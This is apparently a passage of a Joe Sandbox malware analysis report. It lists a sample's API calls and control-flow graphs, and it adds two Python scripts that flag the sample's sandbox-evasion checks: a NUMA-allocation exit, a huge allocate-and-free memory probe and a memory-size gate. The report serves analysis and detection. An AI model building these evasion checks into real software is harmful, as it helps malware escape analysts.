                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008FF3F5
                            • lstrlen.KERNEL32(0090CFF4), ref: 008FF400
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008FF419
                            • lstrcpy.KERNEL32(00000000,00914FA4), ref: 008FF43E
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008FF46C
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008FF4A0
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008FF4D0
                            • lstrlen.KERNEL32(012E6538), ref: 008FF4F5
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Similarity
                            • API ID: lstrcpy$lstrlen
                            • String ID: ERROR
                            • API String ID: 367037083-2861137601
                            • Opcode ID: 08767cb6152004faadb95b2470de99565a5837e681b2df7785ac9124cf0a89e3
                            • Instruction ID: aa88e574db1100263731fc3ce7de1c4c69aad650c8c812663ff41d1497e733bb
                            • Opcode Fuzzy Hash: 08767cb6152004faadb95b2470de99565a5837e681b2df7785ac9124cf0a89e3
                            • Instruction Fuzzy Hash: C0A25E7190124A9FCB20EF79D848A6ABBB4FF45714F188079EA05DB362EB31DC42CB51
                            APIs
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 009001E3
                            • lstrlen.KERNEL32(0090CFF4), ref: 0090028D
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 009002B1
                            • lstrlen.KERNEL32(0090CFF4), ref: 009002BC
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 009002E0
                            • lstrlen.KERNEL32(0090CFF4), ref: 009002EB
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 0090030F
                            • lstrlen.KERNEL32(0090CFF4), ref: 0090032A
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 00900359
                            • lstrlen.KERNEL32(0090CFF4), ref: 00900364
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 00900393
                            • lstrlen.KERNEL32(0090CFF4), ref: 0090039E
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 009003D6
                            • lstrlen.KERNEL32(0090CFF4), ref: 00900420
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 00900458
                            • lstrcpy.KERNEL32(00000000,?), ref: 0090076B
                            • lstrlen.KERNEL32(012E6598), ref: 0090077B
                            • lstrcpy.KERNEL32(00000000,?), ref: 009007A7
                            • lstrcat.KERNEL32(00000000,?), ref: 009007B3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 009007DE
                            • lstrlen.KERNEL32(012FF168), ref: 009007F5
                            • lstrcpy.KERNEL32(00000000,?), ref: 0090081C
                            • lstrcat.KERNEL32(00000000,?), ref: 00900828
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00900851
                            • lstrlen.KERNEL32(012E66B8), ref: 00900868
                            • lstrcpy.KERNEL32(00000000,?), ref: 00900899
                            • lstrcat.KERNEL32(00000000,?), ref: 009008A5
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 009008D6
                            • lstrcpy.KERNEL32(00000000,012F9230), ref: 0090091B
                              • Part of subcall function 008E1530: lstrcpy.KERNEL32(00000000,?), ref: 008E1557
                              • Part of subcall function 008E1530: lstrcpy.KERNEL32(00000000,?), ref: 008E1579
                              • Part of subcall function 008E1530: lstrcpy.KERNEL32(00000000,?), ref: 008E159B
                              • Part of subcall function 008E1530: lstrcpy.KERNEL32(00000000,?), ref: 008E15FF
                            • lstrcpy.KERNEL32(00000000,?), ref: 0090094F
                            • lstrcpy.KERNEL32(00000000,012FF180), ref: 009009B7
                            • lstrcpy.KERNEL32(00000000,012F93E0), ref: 00900A28
                            • lstrcpy.KERNEL32(00000000,fplugins), ref: 00900A9F
                            • lstrcpy.KERNEL32(00000000,?), ref: 00900AF8
                            • lstrcpy.KERNEL32(00000000,012F92F0), ref: 00900BC8
                              • Part of subcall function 008E24E0: lstrcpy.KERNEL32(00000000,?), ref: 008E2528
                              • Part of subcall function 008E24E0: lstrcpy.KERNEL32(00000000,?), ref: 008E254E
                              • Part of subcall function 008E24E0: lstrcpy.KERNEL32(00000000,?), ref: 008E2577
                            • lstrcpy.KERNEL32(00000000,012F92E0), ref: 00900C9E
                            • lstrcpy.KERNEL32(00000000,?), ref: 00900D51
                            • lstrcpy.KERNEL32(00000000,012F92E0), ref: 00900F28
                             Memory Dump Source
                             • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true (associated dumps as listed above)
                             Joe Sandbox IDA Plugin
                             • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Similarity
                            • API ID: lstrcpy$lstrlen$lstrcat
                            • String ID: fplugins
                            • API String ID: 2500673778-38756186
                            • Opcode ID: 6135c4325571a6d1430a8c83f817d010532a211162c2dc428f151fb6291bd165
                            • Instruction ID: a940065ba8218ddacc4e4e865f66e48c980cf9e09f561a0aade6b1d89017d4a0
                            • Opcode Fuzzy Hash: 6135c4325571a6d1430a8c83f817d010532a211162c2dc428f151fb6291bd165
                            • Instruction Fuzzy Hash: C0E24C71A053418FD724DF29C488B6ABBE9FF89314F58856DE48DCB2A2DB31D845CB42
                            APIs
                            • lstrlen.KERNEL32(012E6538), ref: 008FF4F5
                            • lstrcpy.KERNEL32(00000000,?), ref: 008FF583
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008FF5A7
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008FF65B
                            • lstrcpy.KERNEL32(00000000,012E6538), ref: 008FF69B
                            • lstrcpy.KERNEL32(00000000,012F9190), ref: 008FF6CA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008FF77E
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 008FF7FC
                            • lstrcpy.KERNEL32(00000000,?), ref: 008FF82C
                            • lstrcpy.KERNEL32(00000000,?), ref: 008FF87A
                            • StrCmpCA.SHLWAPI(?,ERROR), ref: 008FF8F8
                            • lstrlen.KERNEL32(012F90D0), ref: 008FF926
                            • lstrcpy.KERNEL32(00000000,012F90D0), ref: 008FF951
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008FF973
                            • lstrcpy.KERNEL32(00000000,?), ref: 008FF9C4
                            • StrCmpCA.SHLWAPI(?,ERROR), ref: 008FFC12
                            • lstrlen.KERNEL32(012F90E0), ref: 008FFC40
                            • lstrcpy.KERNEL32(00000000,012F90E0), ref: 008FFC6B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008FFC8D
                            • lstrcpy.KERNEL32(00000000,?), ref: 008FFCDE
                             Memory Dump Source
                             • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true (associated dumps as listed above)
                             Joe Sandbox IDA Plugin
                             • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Similarity
                            • API ID: lstrcpy$lstrlen
                            • String ID: ERROR
                            • API String ID: 367037083-2861137601
                            • Opcode ID: 270bce78fb7e34b81647ee95652d25c1a3fcb34921a76bc8876fbfadc80ccf88
                            • Instruction ID: 384bdd01deba234fba1a90d7da4c4828badd3ea0ec94aaa053745aa0a4bede91
                            • Opcode Fuzzy Hash: 270bce78fb7e34b81647ee95652d25c1a3fcb34921a76bc8876fbfadc80ccf88
                            • Instruction Fuzzy Hash: BDF14C70A0120A9FCB24DF79D854A69B7E5FF44714B18C1B9DA09DB3A2EB31DC52CB50

                             Control-flow Graph (graph image omitted; structure recovered from the block list, function at 8f8df0)
                             • Entry block 8f8df0-8f8e14 performs a StrCmpCA; one branch goes straight to 8f8e16-8f8e17 ExitProcess, the other to 8f8e1d-8f8e36 and from there either to the exit block 8f9032-8f903f (call 8e2a20) or into the loop below.
                             • Loop head 8f8e43 / 8f8e46-8f8e49: the dispatch block 8f8e4f fans out to nine StrCmpCA blocks (8f8ed4, 8f8ef4, 8f8f0d, 8f8f2d, 8f8f4d, 8f8f6d, 8f8f8d, 8f8fa6, 8f8fbf) and four lstrlen blocks (8f8e56, 8f8e80, 8f8eaa, 8f8fd8).
                             • Each lstrlen block calls 8e2a20 and/or 8e2930, then passes through 8f9003-8f9009 and, on one path, 8f900b-8f900d lstrcpy; all paths rejoin at 8f9013-8f902c, which loops back to 8f8e43 or leaves through 8f9032-8f903f.
                             APIs (from the graph): StrCmpCA, lstrlen, lstrcpy, ExitProcess
                             Memory Dump Source
                             • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true (associated dumps as listed above)
                             Joe Sandbox IDA Plugin
                             • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Similarity
                            • API ID: ExitProcess
                            • String ID: block
                            • API String ID: 621844428-2199623458
                            • Opcode ID: d611e1647cc446dfa7849ab579d3d6516bf0c0f67530138c9912a47e4c94aca9
                            • Instruction ID: 985337baa0c216396aa6d5c6f2fb52bd96905bf3e422fa83b058d4924518fc75
                            • Opcode Fuzzy Hash: d611e1647cc446dfa7849ab579d3d6516bf0c0f67530138c9912a47e4c94aca9
                            • Instruction Fuzzy Hash: 46513070A04A49EBC7309F75D888BBA77F4FB88704B50482EE682D3650EF74E5819B51

                             Control-flow Graph (graph image omitted; structure recovered from the block list, function at 8e4bc0)
                             • 8e4bc0-8e4bce enters a short self-looping block 8e4bd0-8e4bd5; the single remaining block 8e4bd7-8e4c48 allocates three buffers with operator new (??2@YAPAXI@Z, 0x800 bytes each per the API list), calls lstrlen and InternetCrackUrlA on the input, then calls 8e2a20.
                            APIs
                            • ??2@YAPAXI@Z.MSVCRT(00000800,?), ref: 008E4BF7
                            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 008E4C01
                            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 008E4C0B
                            • lstrlen.KERNEL32(?,00000000,?), ref: 008E4C1F
                            • InternetCrackUrlA.WININET(?,00000000), ref: 008E4C27
                             Memory Dump Source
                             • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true (associated dumps as listed above)
                             Joe Sandbox IDA Plugin
                             • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Similarity
                            • API ID: ??2@$CrackInternetlstrlen
                            • String ID: <
                            • API String ID: 1683549937-4251816714
                            • Opcode ID: 298732c947e2c95ad62191e3825dffc0147a99adbae014f026d69173118ef358
                            • Instruction ID: e22f2fc63288737c430285cb4f4ce25872e19456ab8268e4f46e679b0013ce8f
                            • Opcode Fuzzy Hash: 298732c947e2c95ad62191e3825dffc0147a99adbae014f026d69173118ef358
                            • Instruction Fuzzy Hash: 75011B71D00218ABDB10DFA9E845B9EBBB8FB49320F008526F914E7290DB7459058BD4

                             Control-flow Graph (graph image omitted; structure recovered from the block list, function at 8e1030)
                             • 8e1030-8e1055 calls GetCurrentProcess and VirtualAllocExNuma; one branch goes to 8e1057-8e1058 ExitProcess, the other to 8e105e-8e107b VirtualAlloc.
                             • 8e107d-8e1080 and 8e1082-8e1088 test the VirtualAlloc result; 8e108a-8e10ab VirtualFree releases the region, and 8e10b1-8e10b6 returns.
                             • The VirtualAlloc size 17C841C0 in the API list below is 399,000,000 bytes with MEM_COMMIT|MEM_RESERVE (00003000) and PAGE_READWRITE (00000004); an allocation of that size that is freed immediately, behind a VirtualAllocExNuma-or-exit branch, is the shape of a resource-based sandbox check rather than working memory.
                            APIs
                            • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 008E1046
                            • VirtualAllocExNuma.KERNEL32(00000000), ref: 008E104D
                            • ExitProcess.KERNEL32 ref: 008E1058
                            • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 008E106C
                            • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 008E10AB
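                             The five records above are the kind of pattern an analyst wants pulled out of a report automatically rather than by eye: VirtualAllocExNuma followed by ExitProcess, then a very large VirtualAlloc that is released at once. The following Python script is an added example and is not part of the Joe Sandbox report or of the analysed sample. It parses lines in the report's `api.MODULE(args), ref: addr` form, decodes the VirtualAlloc/VirtualFree flag arguments with the documented Win32 constants, and flags that gate. The embedded input is copied from the listing above; the regex is an assumption about the report format, and the 256 MiB threshold is a tuning choice. Note that the report's argument recovery is heuristic, so values shown on one line can belong to a neighbouring call; the parser reports what is on each line and nothing more.

```python
"""Parse Joe Sandbox 'APIs' lines and flag the NUMA / large-allocation gate.

Added example, not part of the report or of the analysed sample.  The regex
and the constant tables are assumptions about the report format and the
documented Win32 values; LARGE_ALLOC_BYTES is a tuning choice.
"""
import re
from dataclasses import dataclass

# Constructed input: the five records listed for the function at 0x8E1030.
SAMPLE_API_LINES = """
• GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 008E1046
• VirtualAllocExNuma.KERNEL32(00000000), ref: 008E104D
• ExitProcess.KERNEL32 ref: 008E1058
• VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 008E106C
• VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 008E10AB
"""

# One record: "<api>.<module>(<args>), ref: <addr>"; the argument list is optional.
API_LINE = re.compile(
    r"^\s*•?\s*(?P<api>[^.\s(]+)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
HEX32 = re.compile(r"[0-9A-Fa-f]{8}")   # the report zero-pads numeric arguments to 8 digits

# Documented Win32 constants for VirtualAlloc/VirtualFree arguments.
MEM_FLAGS = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x4000: "MEM_DECOMMIT",
             0x8000: "MEM_RELEASE", 0x100000: "MEM_TOP_DOWN"}
PAGE_PROT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
             0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
             0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}

# Assumption: allocations at or above this size are treated as RAM probes.
LARGE_ALLOC_BYTES = 256 * 1024 * 1024


@dataclass
class ApiCall:
    api: str
    module: str
    args: list   # ints for 8-digit hex values, raw strings otherwise ('?', 'ERROR')
    ref: int     # address of the call site


def parse_api_lines(text: str) -> list:
    """Turn the report's bullet lines into ApiCall records; non-matching lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        args = []
        for a in (m.group("args") or "").split(","):
            a = a.strip()
            if a:
                args.append(int(a, 16) if HEX32.fullmatch(a) else a)
        calls.append(ApiCall(m.group("api"), m.group("module"), args, int(m.group("ref"), 16)))
    return calls


def decode_flags(value, table: dict) -> str:
    """Render a bitmask with the names in `table`; unknown or non-numeric values pass through."""
    if not isinstance(value, int):
        return str(value)
    names = [name for bit, name in table.items() if value & bit]
    return "|".join(names) if names else hex(value)


def describe_virtual_alloc(call: ApiCall) -> dict:
    """VirtualAlloc(lpAddress, dwSize, flAllocationType, flProtect) -> decoded fields."""
    addr, size, atype, prot = (call.args + [None] * 4)[:4]
    return {"address": addr, "size": size,
            "type": decode_flags(atype, MEM_FLAGS), "protect": decode_flags(prot, PAGE_PROT)}


def find_resource_gate(calls: list) -> list:
    """Flag an ExitProcess right after VirtualAllocExNuma, any very large VirtualAlloc,
    and a VirtualFree(MEM_RELEASE) of that same size (allocate-and-discard probe)."""
    findings = []
    names = [c.api for c in calls]
    for i, name in enumerate(names[:-1]):
        if name == "VirtualAllocExNuma" and names[i + 1] == "ExitProcess":
            findings.append(f"VirtualAllocExNuma at {calls[i].ref:08X} is followed by ExitProcess")
    large_sizes = set()
    for c in calls:
        if c.api == "VirtualAlloc":
            d = describe_virtual_alloc(c)
            if isinstance(d["size"], int) and d["size"] >= LARGE_ALLOC_BYTES:
                large_sizes.add(d["size"])
                findings.append(f"VirtualAlloc of {d['size']:,} bytes "
                                f"({d['type']}, {d['protect']}) at {c.ref:08X}")
        elif c.api == "VirtualFree" and len(c.args) >= 3:
            size, ftype = c.args[1], c.args[2]
            if size in large_sizes and isinstance(ftype, int) and ftype & 0x8000:
                findings.append(f"VirtualFree(MEM_RELEASE) of the same {size:,} bytes at {c.ref:08X}")
    return findings


if __name__ == "__main__":
    for finding in find_resource_gate(parse_api_lines(SAMPLE_API_LINES)):
        print(finding)
```

Run against the listing above it reports the NUMA-then-exit pair, the 399,000,000-byte MEM_COMMIT|MEM_RESERVE PAGE_READWRITE allocation at 008E106C, and its MEM_RELEASE at 008E10AB. The same parser accepts the lstrcpy/StrCmpCA records elsewhere in this report, keeping non-numeric arguments such as `?` and `ERROR` as strings, so it can be extended with further pattern checks without touching the parsing.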
                             Memory Dump Source
                             • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true (associated dumps as listed above)
                             Joe Sandbox IDA Plugin
                             • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Similarity
                            • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                            • String ID:
                            • API String ID: 3477276466-0
                            • Opcode ID: 51d9a3577c546cb3ddae93c3b0a5d135dbcc27e13465603aebab997031b82895
                            • Instruction ID: eb333bf29cb48e7ef82fddb73fbe30efc01a637665a02307d2c6684b6e6fcd79
                            • Opcode Fuzzy Hash: 51d9a3577c546cb3ddae93c3b0a5d135dbcc27e13465603aebab997031b82895
                            • Instruction Fuzzy Hash: A101D1717402447BEB204A656C2EFAA77E9E785B01F608414F704E7280DDB1E9008A64

                             Control-flow Graph (graph image omitted; structure recovered from the block list, function at 8ff070)
                             • 8ff070-8ff095 calls 8e2930; one path passes through 8ff097-8ff09f and 8ff0a1-8ff0a3 lstrcpy, both paths reach 8ff0a9-8ff0ad (call 8e6c40) and 8ff0b2-8ff0c8 StrCmpCA (compared against "ERROR" per the API list below).
                             • After the compare: either 8ff0ca-8ff0e2 (call 8e2a20, call 8e2930) then 8ff0e4-8ff0ec / 8ff0ee-8ff0ef and 8ff11e-8ff11f lstrcpy, or 8ff0f1-8ff0f8 (call 8e2a20) into the loop 8ff100-8ff108, then 8ff10a-8ff117 (call 8e2930) and 8ff119 into the same lstrcpy; both join at 8ff125-8ff180, which calls 8e2a20 ten times.
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 008FF0A3
                            • StrCmpCA.SHLWAPI(?,ERROR), ref: 008FF0BE
                            • lstrcpy.KERNEL32(00000000,ERROR), ref: 008FF11F
                             Memory Dump Source
                             • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true (associated dumps as listed above)
                             Joe Sandbox IDA Plugin
                             • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Similarity
                            • API ID: lstrcpy
                            • String ID: ERROR
                            • API String ID: 3722407311-2861137601
                            • Opcode ID: 20e6921b04042cfd05e51914b6bca02b96d6e46e9e10ecbabadb2779be003eeb
                            • Instruction ID: dd1d70bd10e40d534ff28cdf337184b1b3feab9bb139050009771f0c9d0e3d70
                            • Opcode Fuzzy Hash: 20e6921b04042cfd05e51914b6bca02b96d6e46e9e10ecbabadb2779be003eeb
                            • Instruction Fuzzy Hash: B6213D3162029A9BCB21FF7EDC46AAA37A8FF15704F005434B95ADB243DF70E9508791

                             Control-flow Graph (graph image omitted; structure recovered from the block list, function at 8f8dcb)
                             • Same block structure as the graph of the function at 8f8df0 above, with the entry block extended to 8f8dcb-8f8e14: StrCmpCA gating ExitProcess at 8f8e16-8f8e17, the dispatch loop at 8f8e4f over nine StrCmpCA and four lstrlen blocks, the 8e2a20/8e2930 calls, the lstrcpy at 8f900b-8f900d, and the exit through 8f9032-8f903f.
                             APIs (from the graph): StrCmpCA, lstrlen, lstrcpy, ExitProcess
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess
                            • String ID: block
                            • API String ID: 621844428-2199623458
                            • Opcode ID: 28972335fd30d6bfb42975e6d94842af977f1ac3b00f1a9684df438cf27fa948
                            • Instruction ID: 0541a07e733a8eb4464886d8b4b5bb5fc46d09ec76c1f306e6fdad3b727be269
                            • Opcode Fuzzy Hash: 28972335fd30d6bfb42975e6d94842af977f1ac3b00f1a9684df438cf27fa948
                            • Instruction Fuzzy Hash: 62E08620604349F7CB00ABB5DCACDDA7BB8FF49704B80453CF54597151EB309916CB69

                            Control-flow Graph

                            control_flow_graph 2948 8e10c0-8e10cb 2949 8e10d0-8e10dc 2948->2949 2951 8e10de-8e10f3 GlobalMemoryStatusEx 2949->2951 2952 8e10f5-8e1106 2951->2952 2953 8e1112-8e1114 ExitProcess 2951->2953 2954 8e111a-8e111d 2952->2954 2955 8e1108 2952->2955 2955->2953 2956 8e110a-8e1110 2955->2956 2956->2953 2956->2954
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitGlobalMemoryProcessStatus
                            • String ID: @
                            • API String ID: 803317263-2766056989
                            • Opcode ID: 90b4fe2daa9d5133f6951935a95775fd029a15e74732101c4145456168cb0bf5
                            • Instruction ID: 28ce563f78c6fb56bea60dadde4cf2b367b0f014e09b5d203104d28af1587831
                            • Opcode Fuzzy Hash: 90b4fe2daa9d5133f6951935a95775fd029a15e74732101c4145456168cb0bf5
                            • Instruction Fuzzy Hash: 0EF027702082C89BEF10AA66D80E32DF7D8FB02350F104929DE9AC3180E630C9408127
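The two control-flow graphs above are the report's evidence for its "tries to detect sandboxes" and "may stop execution after checking" signatures: function 8e10c0 calls GlobalMemoryStatusEx and has a direct edge into a block that calls ExitProcess, and function 8f8dcb fans out from one block into a chain of StrCmpCA comparisons whose first comparison likewise has a direct edge into ExitProcess. When a report contains hundreds of such records, an analyst wants to find those bail-out points mechanically. The following parser is an added example, not code from the report or from Joe Sandbox; the two graph strings are copied verbatim from the records above, the token grammar is inferred from them (an assumption: `<id> <hex>[-<hex>]` opens a basic block, bare words after it are that block's labels, `call <hex>` is a two-token label, `<id>-><id>` is an edge), and "exit gate" is this example's own term for a block with a direct edge into an ExitProcess block.

```python
"""Parse the text control-flow graphs a Joe Sandbox report emits and find
the basic blocks that decide between continuing and ExitProcess.

Added example, not part of the report or of Joe Sandbox. The graph strings
are copied from the records above (functions 8e10c0 and 8f8dcb). The token
grammar is inferred from those lines (assumption, see lead-in).
"""
import re
from collections import defaultdict, deque
from dataclasses import dataclass, field

EDGE = re.compile(r"^(\d+)->(\d+)$")
SPAN = re.compile(r"^[0-9a-f]+(?:-[0-9a-f]+)?$")   # "start-end" or one address


@dataclass
class Block:
    span: str
    labels: list = field(default_factory=list)      # API names or "call <addr>"


@dataclass
class Cfg:
    entry: int = None
    nodes: dict = field(default_factory=dict)
    succ: dict = field(default_factory=lambda: defaultdict(list))
    pred: dict = field(default_factory=lambda: defaultdict(list))


def parse_cfg(line):
    tokens = line.split()
    if not tokens or tokens[0] != "control_flow_graph":
        raise ValueError("not a control_flow_graph line")
    cfg, cur, i = Cfg(), None, 1
    while i < len(tokens):
        tok, m = tokens[i], EDGE.match(tokens[i])
        if m:
            a, b = int(m.group(1)), int(m.group(2))
            cfg.succ[a].append(b)
            cfg.pred[b].append(a)
            i += 1
        elif tok.isdigit() and i + 1 < len(tokens) and SPAN.match(tokens[i + 1]):
            cur = int(tok)                              # a new basic block
            cfg.nodes[cur] = Block(tokens[i + 1])
            cfg.entry = cur if cfg.entry is None else cfg.entry
            i += 2
        elif cur is None:
            raise ValueError("label before any block: " + tok)
        elif tok == "call" and i + 1 < len(tokens):
            cfg.nodes[cur].labels.append("call " + tokens[i + 1])
            i += 2
        else:
            cfg.nodes[cur].labels.append(tok)           # API called in block
            i += 1
    return cfg


def reaches(cfg, src, dst):
    """True if dst is reachable from src along forward edges (BFS)."""
    seen, queue = {src}, deque([src])
    while queue:
        n = queue.popleft()
        if n == dst:
            return True
        for s in cfg.succ.get(n, []):
            if s not in seen:
                seen.add(s)
                queue.append(s)
    return False


def exit_gates(cfg):
    """Blocks with a direct edge into a block that calls ExitProcess: the
    decision points of a bail-out check, as (id, labels) sorted by id."""
    exits = {n for n, b in cfg.nodes.items() if "ExitProcess" in b.labels}
    gates = {p for e in exits for p in cfg.pred.get(e, [])}
    return [(g, cfg.nodes[g].labels) for g in sorted(gates)]


# Both graphs copied verbatim from the report records above.
CFG_MEMCHECK = (
    "control_flow_graph 2948 8e10c0-8e10cb 2949 8e10d0-8e10dc 2948->2949 "
    "2951 8e10de-8e10f3 GlobalMemoryStatusEx 2949->2951 2952 8e10f5-8e1106 "
    "2951->2952 2953 8e1112-8e1114 ExitProcess 2951->2953 2954 8e111a-8e111d "
    "2952->2954 2955 8e1108 2952->2955 2955->2953 2956 8e110a-8e1110 "
    "2955->2956 2956->2953 2956->2954"
)
CFG_BLOCKLIST = (
    "control_flow_graph 2886 8f8dcb-8f8e14 StrCmpCA 2888 8f8e1d-8f8e36 2886->2888 2889 8f8e16-8f8e17 ExitProcess 2886->2889 2891 8f8e3c-8f8e41 2888->2891 2892 8f9032-8f903f call 8e2a20 2888->2892 "
    "2894 8f8e46-8f8e49 2891->2894 2896 8f8e4f 2894->2896 2897 8f9013-8f902c 2894->2897 2898 8f8f0d-8f8f1b StrCmpCA 2896->2898 2899 8f8f2d-8f8f3b StrCmpCA 2896->2899 2900 8f8f4d-8f8f5b StrCmpCA 2896->2900 "
    "2901 8f8f6d-8f8f7b StrCmpCA 2896->2901 2902 8f8f8d-8f8f9b StrCmpCA 2896->2902 2903 8f8eaa-8f8eb9 lstrlen 2896->2903 2904 8f8fa6-8f8fb4 StrCmpCA 2896->2904 2905 8f8e80-8f8e8f lstrlen 2896->2905 "
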